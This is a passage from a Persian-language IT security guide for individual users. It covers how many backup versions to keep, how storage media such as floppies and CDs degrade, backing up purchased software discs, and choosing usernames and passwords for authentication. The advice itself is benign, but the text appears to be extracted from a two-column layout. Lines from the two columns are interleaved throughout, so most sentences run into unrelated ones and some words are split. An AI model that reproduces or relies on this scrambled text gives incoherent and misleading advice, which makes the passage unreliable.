ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮﻱ ،ﻫﻢ ﺑﻪ ﺁﺧـﺮﻳﻦ ﻧـﺴﺨﺔ ﭘـﺸﺘﻴﺒﺎﻥ
ﺩﺳﺘﮕﺎﻫﻲ ﻛﻪ ﭘﺸﺘﻴﺒﺎﻥ ﺑﻮﺳـﻴﻠﺔ ﺁﻥ ﻧﻮﺷـﺘﻪﺷـﺪﻩ ﺩﺍﺭﺍﻱ • ﻛﺎﻣﻞ ﻭ ﻫﻢ ﺑﻪ ﺁﺧﺮﻳﻦ ﻧﺴﺨﺔ ﭘﺸﺘﻴﺒﺎﻥ ﺍﻓﺰﺍﻳـﺸﻲ
ﺍﺷﻜﺎﻝ ﺑـﻮﺩﻩ ﻭ ﺑـﻪ ﻫﻤـﻴﻦ ﺩﻟﻴـﻞ ﺩﺍﺩﺓ ﻧﻮﺷـﺘﻪﺷـﺪﻩ ﺩﺭ ﻧﻴﺎﺯ ﺧﻮﺍﻫﻴﺪ ﺩﺍﺷﺖ.
ﭘﺸﺘﻴﺒﺎﻥ ﻗﺎﺑﻞ ﺧﻮﺍﻧﺪﻥ ﻧﺒﺎﺷﺪ .ﺩﺭ ﺍﻳﻦ ﻣﻮﺍﺭﺩ ﺍﻣﻜـﺎﻥ ﺩﺍﺭﺩ
21 Compatibility
22 Incremental Backup
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ٦٠
ﺍﺳﺘﻔﺎﺩﺓ ﻣﺠﺪﺩ ﻫـﻢ ﻧﺪﺍﺭﻧـﺪ؛ ﺍﻣـﺎ ﻫﻤـﻮﺍﺭﻩ ﺑﺎﻳـﺪ ﭼﻨـﺪ ﻧـﺴﺨﻪ ﺍﺯ ﺑﺘﻮﺍﻥ ﺑﺎ ﻳﻚ ﺩﺳﺘﮕﺎﻩ ﻣﺸﺎﺑﻪ ﺩﻳﮕﺮ ،ﭘﺸﺘﻴﺒﺎﻥ ﻣﻮﺭﺩ ﻧﻈﺮ ﺭﺍ
ﭘﺸﺘﻴﺒﺎﻧﻬﺎ ﺭﺍ ﻧﮕﻬﺪﺍﺭﻳﺪ .ﺩﺭ ﺗﻤﺎﻡ ﻣﺜﺎﻟﻬﺎﻱ ﺑﺎﻻ ﻣﻲﺗـﻮﺍﻥ ﺍﺯ ﭼﻬـﺎﺭ ﺧﻮﺍﻧﺪ.
ﻧﺴﺨﺔ ﺁﺧﺮ ﻧﮕﻬﺪﺍﺭﻱ ﻛﺮﺩ. ﺭﺳﺎﻧﻪﺍﻱ ﻛﻪ ﭘـﺸﺘﻴﺒﺎﻥ ﺭﻭﻱ ﺁﻥ ﻗـﺮﺍﺭ ﺩﺍﺩﻩ ﺷـﺪﻩ ﺩﭼـﺎﺭ •
ﭼﺮﺍ ﺑﻬﺘﺮ ﺍﺳﺖ ﺍﻳﻨﮕﻮﻧﻪ ﻋﻤﻞ ﺷﻮﺩ؟ ﭼﺮﺍ ﺑﺎﻳﺪ ﻧﺴﺨﺔ ﻣﺮﺑـﻮﻁ ﺑـﻪ ﻧﻘﺺ ﺷﺪﻩ ﺑﺎﺷﺪ .ﺍﻳﻦ ﻧﻘﺺ ﺭﺳﺎﻧﻪ ﺩﺭ ﺩﻳﺴﻜﻬﺎﻱ ﻓﻼﭘﻲ
ﻣــﺎﻩ ﻗﺒــﻞ ﺭﺍ ﺩﺭ ﺷــﺮﺍﻳﻄﻲ ﻛــﻪ ﻧــﺴﺨﺔ ﺟﺪﻳــﺪﺗﺮﻱ ﻭﺟــﻮﺩ ﺩﺍﺭﺩ ﺍﺷﻜﺎﻝ ﺑﺴﻴﺎﺭ ﺭﺍﻳﺠﻲ ﺑﻮﺩ ﺑﻄﻮﺭﻳﻜﻪ ﺍﮔﺮ ﻳﻚ ﺩﻳﺴﻚ ﺗﻨﻬﺎ
ﻧﮕﻬﺪﺍﺭﻱ ﻛﺮﺩ؟ ﺩﻟﻴـﻞ ﺁﻥ ﺳـﺎﺩﻩ ﺍﺳـﺖ :ﻣﻤﻜـﻦ ﺍﺳـﺖ ﻧـﺴﺨﺔ ﭼﻨﺪ ﺭﻭﺯ ﺑﻌﺪ ﺍﺯ ﺗﻬﻴﻪ ﺷﺪﻥ ﻏﻴﺮ ﻗﺎﺑﻞ ﺧﻮﺍﻧـﺪﻥ ﻣـﻲﺷـﺪ
ﺁﺧﺮﻱ ﻛﻪ ﺍﻳﺠﺎﺩ ﻛﺮﺩﻩﺍﻳﺪ ﻗﺎﺑﻞ ﺧﻮﺍﻧﺪﻥ ﻧﺒﺎﺷﺪ ،ﮔﻢ ﺷﻮﺩ ،ﻭ ﻳﺎ ﺑﻪ ﭼﻨﺪﺍﻥ ﺗﻌﺠﺐ ﻛﺴﻲ ﺭﺍ ﺑـﺮ ﻧﻤـﻲﺍﻧﮕﻴﺨـﺖ .ﺩﻳـﺴﻜﻬﺎﻱ
ﺳﺮﻗﺖ ﺭﻭﺩ .ﺩﺭ ﺍﻳﻨﺼﻮﺭﺕ ﻭﺍﺿﺢ ﺍﺳﺖ ﻛﻪ ﺍﮔﺮﭼـﻪ ﻧـﺴﺨﻪﻫـﺎﻱ ﻓﺸﺮﺩﻩ ﺑﻌﻨـﻮﺍﻥ ﺭﺳـﺎﻧﻪﻫـﺎﻱ ﺑـﺴﻴﺎﺭ ﻣﺎﻧـﺪﮔﺎﺭﺗﺮ ﺷـﻬﺮﺕ
ﻼ ﺑـﻪ ﺭﻭﺯ ﻧﻴـﺴﺘﻨﺪ ،ﻭﻟـﻲ ﺑﻮﺩﻧـﺸﺎﻥ ﺑﻬﺘـﺮ ﺍﺯ
ﻣﺎﻫﻬﺎﻱ ﻗﺒﻠﻲ ﻛﺎﻣ ﹰ ﺩﺍﺷﺘﻨﺪ ،ﺍﻣﺎ ﻳـﻚ ﻣﻄﺎﻟﻌـﻪ ﺩﺭ ﺳـﺎﻟﻬﺎﻱ ﺍﺧﻴـﺮ ﻧـﺸﺎﻥ ﺩﺍﺩ
ﻧﺒﻮﺩﻧﺸﺎﻥ ﺍﺳﺖ .ﺍﻳﻦ ﻣﻮﺭﺩ ﻳﻚ ﻣﺜﺎﻝ ﺩﻳﮕﺮ ﺍﺯ ﺍﻳﻦ ﻧﻜﺘـﻪ ﺍﺳـﺖ ﺩﻳﺴﻜﻬﺎﻱ ﻓﺸﺮﺩﻩﺍﻱ ﻛﻪ ﻛﻴﻔﻴﺖ ﭼﻨﺪﺍﻥ ﻣﻄﻠﻮﺑﻲ ﻧﺪﺍﺭﻧـﺪ
ﻛﻪ ﺍﻳﻤﻨـﻲ ﺳـﻄﺢ ﺑـﺎﻻ ﺍﺯ ﻣﻌﻴﺎﺭﻫـﺎﻱ ﭼﻨﺪﮔﺎﻧـﻪ ﻭ ﺗـﺎ ﺣـﺪﻭﺩﻱ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻌـﺪ ﺍﺯ ﮔﺬﺷـﺖ ﺣـﺪﻭﺩ ﺩﻭ ﺳـﺎﻝ ﺍﺯ ﺯﻣـﺎﻥ
ﺗﻜﺮﺍﺭﺷﺪﻩ ﺗﺸﻜﻴﻞ ﻣﻲﺷﻮﺩ. ﻧﻮﺷﺘﻪﺷﺪﻥ ﺍﻃﻼﻋﺎﺕ ﺭﻭﻱ ﺁﻧﻬﺎ ﻏﻴﺮﻗﺎﺑﻞ ﺧﻮﺍﻧﺪﻥ ﺷﻮﻧﺪ.
ﺧﻮﺍﻧﺪﻥ ﻧﺴﺨﻪﻫﺎﻱ ﭘﺸﺘﻴﺒﺎﻥ ﺑﺎ ﺩﺳﺘﮕﺎﻫﻲ ﻏﻴﺮ ﺍﺯ ﺁﻥ ﻛﻪ ﻧﺴﺨﺔ
ﺍﺯ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺧﺮﻳﺪﺍﺭﻱﺷﺪﻩ ﭘﺸﺘﻴﺒﺎﻥ ﺗﻬﻴﻪ ﻛﻨﻴﺪ
ﭘﺸﺘﻴﺒﺎﻥ ﺑﺎ ﺁﻥ ﺗﻬﻴﻪ ﺷﺪﻩ ﻛﻨﺘﺮﻝ ﻣﻨﺎﺳﺒﻲ ﺑﺮﺍﻱ ﻛﺴﺐ ﺍﻃﻤﻴﻨـﺎﻥ
ﺍﮔﺮ ﮔﻮﺍﻫﻲ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻳﻲ ﻛﻪ ﺧﺮﻳﺪﺍﺭﻱ ﻛﺮﺩﻩﺍﻳـﺪ ﺍﻳـﻦ ﺍﺟـﺎﺯﻩ ﺭﺍ ﺍﺯ ﺻﺤﺖ ﺭﺳﺎﻧﺔ ﺣﺎﻭﻱ ﻧـﺴﺨﻪ ﭘـﺸﺘﻴﺒﺎﻥ ﺍﺳـﺖ .ﺩﻗـﺖ ﺩﺍﺷـﺘﻪ
ﻣﻲﺩﻫﺪ ،ﻫﻤﻴﺸﻪ ﺍﺯ ﺩﻳﺴﻜﻬﺎﻱ ﻓﺸﺮﺩﺓ ﻧﺮﻡ ﺍﻓﺰﺍﺭﻫﺎ ﻳـﻚ ﻧـﺴﺨﺔ ﺑﺎﺷﻴﺪ ﻛﻪ ﺍﮔﺮ ﺑﺮﺍﻱ ﻧﻮﺷﺘﻦ ﭘﺸﺘﻴﺒﺎﻥ ﺍﺯ ﺩﻳﺴﻜﻬﺎﻱ ﻣﻐﻨﺎﻃﻴﺴﻲ ﺑﺎ
ﺛﺎﻧﻮﻳﻪ ﺗﻬﻴﻪ ﻛـﺮﺩﻩ ﻭ ﺍﺯ ﺁﻥ ﺑـﺮﺍﻱ ﻋﻤﻠﻴـﺎﺕ ﻧـﺼﺐ ﻭ ﭘـﺸﺘﻴﺒﺎﻧﻲ ﻗﺎﺑﻠﻴﺖ ﭘﺎﻙ ﻛـﺮﺩﻥ ﺍﺳـﺘﻔﺎﺩﻩ ﻣـﻲ ﻛﻨﻴـﺪ )ﻣﺜـﻞ ﺩﻳـﺴﻜﻬﺎﻱ Zipﻭ
ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﻴﺪ. ﻓﻼﭘﻲ( ،ﺍﺯ ﺩﻳﺴﻜﻬﺎﻱ ﻧﻮ ﻭ ﺗﻤﻴﺰ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﻴﺪ.
ﻣﻬﻤﺘﺮﻳﻦ ﻧﻜﺘﻪ ﺩﺭ ﻣﻮﺭﺩ ﻧﺴﺨﻪﻫﺎﻱ ﭘﺸﺘﻴﺒﺎﻥ ﺑﻌﻀﻲ ﺍﺷﺨﺎﺹ ﭘﺸﺘﻴﺒﺎﻧﻬﺎ ﺭﺍ ﺑﺮﺍﻱ ﻣﺪﺕ ﺑـﺴﻴﺎﺭ ﻃـﻮﻻﻧﻲ ﻧﮕـﻪ
ﻣﻲﺩﺍﺭﻧﺪ؛ ﺍﻣﺎ ﺳﺆﺍﻝ ﺍﻳﻦ ﺍﺳـﺖ ﻛـﻪ ﻗـﺮﺍﺭ ﺍﺳـﺖ ﭼـﻪ ﺯﻣـﺎﻧﻲ ﺍﺯ
ﻣﻬﻤﺘﺮﻳﻦ ﻧﻜﺘﻪ ﺩﺭ ﻣﻮﺭﺩ ﻧﺴﺨﻪﻫﺎﻱ ﭘـﺸﺘﻴﺒﺎﻥ ﺍﻳـﻦ ﺍﺳـﺖ ﻛـﻪ
ﻧﺴﺨﻪﻫﺎﻳﻲ ﻛﻪ ﭼﻨﺪ ﺳﺎﻝ ﻗﺒﻞ ﺍﺯ ﺍﺳﻨﺎﺩ ﻭ ﺗـﺼﺎﻭﻳﺮ ﻭ ﺑﺮﻧﺎﻣـﻪﻫـﺎ
ﺗﻬﻴﺔ ﭘﺸﺘﻴﺒﺎﻥ ﺑﺎﻳﺪ ﺩﺭ ﻓﻮﺍﺻـﻞ ﺯﻣـﺎﻧﻲ ﻣـﻨﻈﻢ ﺻـﻮﺭﺕ ﺑﮕﻴـﺮﺩ.
ﺗﻬﻴﻪ ﺷﺪﻩ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ؟ ﺍﮔﺮ ﺩﺭﻧﻈﺮ ﺩﺍﺭﻳﺪ ﺑﺮﺍﻱ ﺯﻣﺎﻥ ﻃـﻮﻻﻧﻲ
ﺑﻌﻀﻲ ﺍﺷﺨﺎﺹ ﺯﺣﻤﺖ ﺗﻬﻴﺔ ﭘﺸﺘﻴﺒﺎﻥ ﺭﺍ ﺑﻪ ﺧﻮﺩ ﻧﻤـﻲﺩﻫﻨـﺪ ﻭ
ﭘﺸﺘﻴﺒﺎﻧﻬﺎ ﺭﺍ ﻧﮕﻬﺪﺍﺭﻱ ﻛﻨﻴﺪ ﺑﺎﻳـﺪ ﺍﺣﺘﻤـﺎﻝ ﺍﺯ ﺭﺩﻩ ﺧـﺎﺭﺝ ﺷـﺪﻥ
ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻪ ﻋﻮﺍﻗﺐ ﺍﻳﻨﻜﺎﺭ ﺧﻮﺩ ﮔﺮﻓﺘـﺎﺭ ﺷـﻮﻧﺪ .ﺍﻳـﻦ ﺍﻓـﺮﺍﺩ
ﺭﺳﺎﻧﻪ ﺭﺍ ﻧﻴﺰ ﻣﺪ ﻧﻈﺮ ﻗﺮﺍﺭ ﺩﻫﻴﺪ .ﺑﺮﺍﻱ ﻣﺜﺎﻝ ﺍﮔﺮ ﺩﺍﺩﻩﺍﻱ ﺩﺭ ﻳﻚ
ﻋﻤﻮﻣﹰﺎ ﻭﻗﺘﻲ ﻫﻢ ﻛﻪ ﺑﺎ ﻣﺸﻜﻠﻲ ﺭﻭﺑﺮﻭ ﻣﻲﺷﻮﻧﺪ ﺗﺼﻮﺭ ﻣﻲﻛﻨﻨـﺪ
ﻓﻼﭘﻲ ﭘﻨﺞ ﺍﻳﻨﭽﻲ ﻛﻪ ﺩﺭ ﺳﺎﻝ ۱۹۸۰ﺭﺍﻳﺞ ﺑـﻮﺩﻩ ﺫﺧﻴـﺮﻩ ﺷـﺪﻩ
ﻣﺸﻜﻞ ﺩﻳﮕﺮ ﺗﻜﺮﺍﺭ ﻧﺨﻮﺍﻫﺪ ﺷﺪ .ﻫﻤﭽﻨﺎﻥ ﺗﻮﺻﻴﺔ ﻣﺎ ﺍﻳﻦ ﺍﺳـﺖ
ﺑﺎﺷﺪ ﺁﻳﺎ ﺍﻣﺮﻭﺯ ﻣﻲﺗﻮﺍﻥ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﺎ ﺩﻳﺴﻚﮔﺮﺩﺍﻥ ﭘـﻨﺞ ﺍﻳﻨﭽـﻲ
ﻛﻪ ﺍﺯ ﻣﺨﺎﻃﺮﺓ ﺍﺣﺘﻤﺎﻟﻲ ﭘﻴﺸﮕﻴﺮﻱ ﻛﻨﻴﺪ ﻭ ﻧﺴﺨﺔ ﭘﺸﺘﻴﺒﺎﻥ ﺗﻬﻴﻪ
ﺑﺮﺍﻱ ﺑﺎﺯﻳﺎﺑﻲ ﺁﻥ ﭘﻴﺪﺍ ﻛﺮﺩ؟
ﻧﻤﺎﻳﻴﺪ.
ﭼﻨﺪ ﻧﺴﺨﺔ ﭘﺸﺘﻴﺒﺎﻥ ﺑﺎﻳﺪ ﻧﮕﻬﺪﺍﺭﻱ ﺷﻮﺩ؟
ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ
ﺍﮔﺮ ﺷﻤﺎ ﻫﻔﺘﻪ ﺍﻱ ﻳﻜﺒﺎﺭ ﺍﺯ ﺁﻧﭽـﻪ ﺩﺍﺭﻳـﺪ ﭘـﺸﺘﻴﺒﺎﻥ ﺗﻬﻴـﻪ ﻛﻨﻴـﺪ
٢٣
ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺍﻳﻦ ﺍﻣﻜﺎﻥ ﺭﺍ ﻓﺮﺍﻫﻢ ﻣﻲﻛﻨﺪ ﻛﻪ ﺭﺍﻳﺎﻧـﻪ ﺑﺪﺍﻧـﺪ ﺩﺭﺻﻮﺭﺕ ﻣﻮﺍﺟﻬﻪ ﺑﺎ ﻳﻚ ﻓﺎﺟﻌﺔ ﻣﺼﻴﺒﺖﺑﺎﺭ ،ﺣﺪﺍﻛﺜﺮ ﺍﻃﻼﻋـﺎﺕ
ﺷﻤﺎ ﭼﻪ ﻛﺴﻲ ﻫﺴﺘﻴﺪ .ﺍﻳﻦ ﺩﺍﻧﺎﻳﻲ ﺑﺎﻋﺚ ﻣﻲﺷﻮﺩ ﻛـﻪ ﺑﺘـﻮﺍﻥ ﺍﺯ ﻳﻚ ﻫﻔﺘـﻪ ﺭﺍ ﺍﺯ ﺩﺳـﺖ ﺧﻮﺍﻫﻴـﺪ ﺩﺍﺩ .ﺍﻧﺠـﺎﻡ ﺍﻳﻨﻜـﺎﺭ ﺍﺯ ﺩﻳـﺪﮔﺎﻩ
ﻻ ﺷﻤﺎ ﺑﺎ ﻳﻚ ﻧـﺎﻡ ﻛـﺎﺭﺑﺮﻱ ﻭ ﺭﻣـﺰ ﺗﻘﻠﺐ ﺟﻠﻮﮔﻴﺮﻱ ﻛﺮﺩ .ﻣﻌﻤﻮ ﹰ ﺍﻣﻨﻴﺘﻲ ﻗﺎﺑﻞ ﺗﻮﺟﻴﻪ ﺍﺳﺖ ﻭﻟﻲ ﺩﺭ ﻃﻮﻝ ﺯﻣﺎﻥ ﻓﻀﺎﻱ ﺍﺷﻐﺎﻝﺷﺪﻩ
ﻋﺒﻮﺭ ﺷﻨﺎﺳﺎﻳﻲ ﻣﻲﺷﻮﻳﺪ ،ﻫﺮﭼﻨﺪ ﮔﻮﻧـﻪﻫـﺎﻱ ﻣﺨﺘﻠﻔـﻲ ﺍﺯ ﺍﻳـﻦ ﺑﻮﺳﻴﻠﺔ ﭘﺸﺘﻴﺒﺎﻧﻬﺎ ﺑﻴﺸﺘﺮ ﻭ ﺑﻴﺸﺘﺮ ﻣـﻲﺷـﻮﺩ .ﭼـﻪ ﺗﻌـﺪﺍﺩ ﺍﺯ ﺍﻳـﻦ
ﺳﻴﺴﺘﻤﻬﺎﻱ ﺷﻨﺎﺳﺎﻳﻲ ﻭﺟﻮﺩ ﺩﺍﺭﺩ .ﻧﻜﺘﺔ ﻗﺎﺑﻞ ﺗﻮﺟـﻪ ﺍﻳـﻦ ﺍﺳـﺖ ﭘﺸﺘﻴﺒﺎﻧﻬﺎ ﺭﺍ ﺑﺎﻳﺪ ﻧﮕﻪ ﺩﺍﺷﺖ؟ ﺍﮔﺮ ﺍﺯ ﺩﻳﺴﻜﻬﺎﻱ ﻣﻐﻨﺎﻃﻴﺴﻲ ﻭ ﻳﺎ
ﻛﻪ ﺑﺎﻳﺪ ﻛﻠﻤﺎﺗﻲ ﺑﻌﻨﻮﺍﻥ ﺭﻣﺰ ﻋﺒﻮﺭ ﺑﻜﺎﺭ ﮔﺮﻓﺘﻪ ﺷﻮﻧﺪ ﻛـﻪ ﻧﺘـﻮﺍﻥ ﺩﻳﺴﻜﻬﺎﻱ ﻓﺸﺮﺩﻩ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻴﺪ ﺩﻟﻴﻠﻲ ﻧـﺪﺍﺭﺩ ﻛـﻪ ﺑﺨﻮﺍﻫﻴـﺪ
ﺁﻧﻬﺎ ﺭﺍ ﺳﺮﻳﻊ ﺩﻭﺭ ﺑﻴﺎﻧﺪﺍﺯﻳﺪ ،ﭼﻮﻥ ﺣﺠﻢ ﻛﻤـﻲ ﺩﺍﺭﻧـﺪ ﻭ ﻗﺎﺑﻠﻴـﺖ
23 Authentication
٦١ ﺑﺨﺶ ﺩﻭﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ
ﺁﻳﺎ ﻣﻲﺧﻮﺍﻫﻴﺪ ﻧﺎﻣﻲ ﺍﻧﺘﺨﺎﺏ ﻛﻨﻴﺪ ﻛﻪ ﻳﺎﺩﺁﻭﺭﻱ ﺁﻥ ﺁﺳﺎﻥ • ﺷﻨﺎﺳﺎﻳﻲ ﻛﺎﺭﺑﺮ
ﺑﺎﺷﺪ؟ ﭼﻨﺎﻧﭽﻪ ﺍﺯ ﻳﻚ ﺧﺪﻣﺖ ﺑﺮﺧﻂ ٢٤ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ ﻛـﻪ
ﺍﻛﺜﺮ ﺳﻴﺴﺘﻤﻬﺎ ﺑﺮﺍﻱ ﺷﻨﺎﺳﺎﻳﻲ ﺍﻓـﺮﺍﺩ ﺍﺯ ﺁﻧﻬـﺎ ﻣـﻲﺧﻮﺍﻫﻨـﺪ ﻛـﻪ
ﺑﻪ ﻧﺪﺭﺕ ﺁﻧﺮﺍ ﺑﻜﺎﺭ ﻣﻲ ﮔﻴﺮﻳﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﻣﺎﻳﻞ ﺑﺎﺷﻴﺪ ﺍﺯ
ﺑﮕﻮﻧﻪﺍﻱ ﻫﻮﻳﺖ ﺧﻮﺩ ﺭﺍ ﺍﺣﺮﺍﺯ ﻛﻨﻨﺪ .ﺍﻳـﻦ ﻣـﺴﺌﻠﻪ ﻣـﻲﺗﻮﺍﻧـﺪ ﺑـﺎ
ﺍﺳﻤﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ ﻛﻪ ﺑﺮﺍﺣﺘﻲ ﺩﺭ ﺫﻫﻦ ﺑﻤﺎﻧـﺪ .ﺑﻌـﻀﻲ
ﺩﺭﻳﺎﻓﺖ ﺍﻃﻼﻋﺎﺕ ﻣﺨﺘﻠﻔﻲ ﺍﻧﺠﺎﻡ ﺷـﻮﺩ :ﻧـﺎﻡ ﻛـﺎﺭﺑﺮﻱ ،ﺷـﻤﺎﺭﺓ
ﺍﻓﺮﺍﺩ ﺑﺮﺍﻱ ﺧﺪﻣﺎﺕ ﻣﺨﺘﻠﻒ ﺍﺯ ﻳﻚ ﻧﺎﻡ ﻛﺎﺭﺑﺮﻱ ﺍﺳـﺘﻔﺎﺩﻩ
ﻋﻀﻮﻳﺖ ،ﺍﺳﻢ ﻋﻀﻮ ﻭ...؛ ﻛـﻪ ﺩﺭ ﺍﻳـﻦ ﻣﺒﺎﺣـﺚ ﻋﻤﻮﻣـﹰﺎ ﺍﺯ ﻧـﺎﻡ
ﻣﻲﻛﻨﻨﺪ ،ﺧـﺼﻮﺻﹰﺎ ﺍﮔـﺮ ﺁﻥ ﺧـﺪﻣﺎﺕ ﺑـﺎ ﻧﻜﺘـﺔ ﻣﻬـﻢ ﻭ
ﻛﺎﺭﺑﺮﻱ ﺍﺳﺘﻔﺎﺩﻩ ﻣـﻲ ﺷـﻮﺩ .ﺩﺭ ﺑﻌـﻀﻲ ﺳﻴـﺴﺘﻤﻬﺎ ﺑﺠـﺎﻱ ﻧـﺎﻡ
ﺣﺴﺎﺳﻲ ﺩﺭ ﺍﺭﺗﺒﺎﻁ ﻧﺒﺎﺷﻨﺪ.
ﻛــﺎﺭﺑﺮﻱ ﺍﺯ ﺁﺩﺭﺱ ﭘــﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜــﻲ ﺍﺳــﺘﻔﺎﺩﻩ ﻣــﻲﺷــﻮﺩ .ﺩﺭ
ﺁﻳﺎ ﻣﻲﺧﻮﺍﻫﻴﺪ ﺣﺪﺱ ﺯﺩﻥ ﻧﺎﻣﻲ ﻛﻪ ﺑﻜﺎﺭ ﻣﻲﺑﺮﻳﺪ ﺑـﺮﺍﻱ • ﺣﻘﻴﻘﺖ ﺩﺭ ﺍﻳـﻦ ﺳﻴـﺴﺘﻤﻬﺎ ﺁﺩﺭﺱ ﭘـﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺑﻌﻨـﻮﺍﻥ
ﺩﻳﮕﺮﺍﻥ ﻣﺸﻜﻞ ﺑﺎﺷﺪ؟ ﻧﺎﻡ ﻛﺎﺭﺑﺮﻱ ﺣﺴﺎﺏ ﺑـﺎﻧﻜﻲ ﺷـﻤﺎ ﻧﻤﺎﺩﻱ ﺧﺎﺹ ﺍﺯ ﻧﺎﻡ ﻛﺎﺭﺑﺮﻱ ﺗﻠﻘﻲ ﻣﻲﮔـﺮﺩﺩ .ﺩﺭ ﺧـﺼﻮﺹ ﻧـﺎﻡ
ﺑﺎﻳﺪ ﺑﮕﻮﻧﻪﺍﻱ ﺗﻌﻴﻴﻦ ﺷﻮﺩ ﻛﻪ ﺩﻳﮕﺮﺍﻥ ﻧﺘﻮﺍﻧﻨﺪ ﺑﻪ ﺭﺍﺣﺘـﻲ ﻛﺎﺭﺑﺮﻱ ﻗﻮﺍﻧﻴﻦ ﻣﺨﺘﻠﻔﻲ ﻣﻲﺗﻮﺍﻧﺪ ﻭﺟﻮﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ:
ﺁﻧﺮﺍ ﺣﺪﺱ ﺑﺰﻧﻨﺪ )ﺟﻬﺖ ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴـﺖ ﻻﺯﻡ ﺑﺎﻳـﺪ ﺍﺯ ﭘـﺸﺘﻴﺒﺎﻧﻲ
ﺑﻌﻀﻲ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎ ﻃﻮﻝ ﺍﺳﻢ ﺭﺍ ﻣﺤﺪﻭﺩ ﻣﻲﻛﻨﻨـﺪ ﻭﻟـﻲ •
ﭼﻨﺪﻻﻳﻪ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩ .ﺍﮔﺮ ﺍﺯ ﺁﺩﺭﺱ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻚ ﻋﻤﻮﻣﻲ ﺧﻮﺩ
ﺑﺮﺍﻱ ﻭﺭﻭﺩ ﺑﻪ ﺳﻴﺴﺘﻢ ﺑﺎﻧﻜﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴـﺪ ،ﺣـﺪﺱﺯﺩﻥ ﺁﻥ ﺑـﺮﺍﻱ ﺑﻌﻀﻲ ﺩﻳﮕﺮ ﺑﺮﺍﻱ ﺁﻥ ﻣﺤﺪﻭﺩﻳﺘﻲ ﻗﺎﺋﻞ ﻧﻤﻲﺷﻮﻧﺪ.
ﺳﺎﺭﻗﺎﻥ ﺳﺎﺩﻩﺗﺮ ﺧﻮﺍﻫﺪ ﺑﻮﺩ(. ﺩﺭ ﺑﻌﻀﻲ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎ ﻣﻲﺗﻮﺍﻥ ﺍﺯ ﻫـﺮ ﻋﻼﻣﺘـﻲ -ﻛـﻪ •
ﺑﻮﺳﻴﻠﺔ ﺻﻔﺤﻪﻛﻠﻴﺪ ﻗﺎﺑﻞ ﻧﻮﺷﺘﻦ ﺑﺎﺷﺪ -ﺩﺭ ﺗﺮﻛﻴﺐ ﻧـﺎﻡ
ﺭﻣﺰ ﻋﺒﻮﺭ ﻛــﺎﺭﺑﺮﻱ ﺍﺳــﺘﻔﺎﺩﻩ ﻛــﺮﺩ ،ﻭﻟــﻲ ﺑﻌــﻀﻲ ﺩﻳﮕــﺮ ﻓﻘــﻂ ﺩﺭ
ﺩﺭ ﺑﻌــﻀﻲ ﺳﻴــﺴﺘﻤﻬﺎ ﻧــﺎﻡ ﻛــﺎﺭﺑﺮﻱ ﺍﺯ ﺳــﻮﻱ ﺳﻴــﺴﺘﻢ ﺗﻌﻴــﻴﻦ ﻣﺤﺪﻭﺩﺓ ﺣـﺮﻭﻑ ﻭ ﺍﻋـﺪﺍﺩ ﻭ ﻓﻘـﻂ ﺍﻧـﺪﻛﻲ ﺩﺭ ﻣﺤـﺪﻭﺩﺓ
ﻣﻲﺷﻮﺩ ،ﻭﻟﻲ ﺭﻣﺰ ﻋﺒﻮﺭ ﻛﻠﻤﻪﺍﻱ ﺍﺳﺖ ﻛﻪ ﺩﺭ ﻫﺮ ﺻﻮﺭﺕ ﺗﻮﺳﻂ ﻋﻼﺋﻢ ﻛﺎﺭ ﻣﻲﻛﻨﻨﺪ.
ﻛﺎﺭﺑﺮ ﺗﻌﻴﻴﻦ ﻣﻲﮔﺮﺩﺩ ﻭ ﺷﻜﻞ ﺁﻥ ﻧﻴﺰ ﺑﺎﻳﺪ ﺑﮕﻮﻧـﻪﺍﻱ ﺑﺎﺷـﺪ ﻛـﻪ ﺑﻌﻀﻲ ﺳﻴﺴﺘﻤﻬﺎ ﺣـﺮﻭﻑ ﺑـﺰﺭﮒ ﻭ ﻛﻮﭼـﻚ ﺭﺍ ﻳﻜـﺴﺎﻥ •
ﺣﺪﺱ ﺯﺩﻧﺶ ﺗﻮﺳﻂ ﺍﺷﺨﺎﺹ ﺩﻳﮕﺮ ﺩﺷﻮﺍﺭ ﺑﺎﺷﺪ. ﺩﺭﻧﻈﺮ ﻣﻲﮔﻴﺮﻧﺪ ﻭﻟﻲ ﺑﻌﻀﻲ ﺩﻳﮕﺮ ﺑﺎ ﺁﻧﻬـﺎ ﺑـﻪ ﻣﻨﺰﻟـﺔ ﺩﻭ
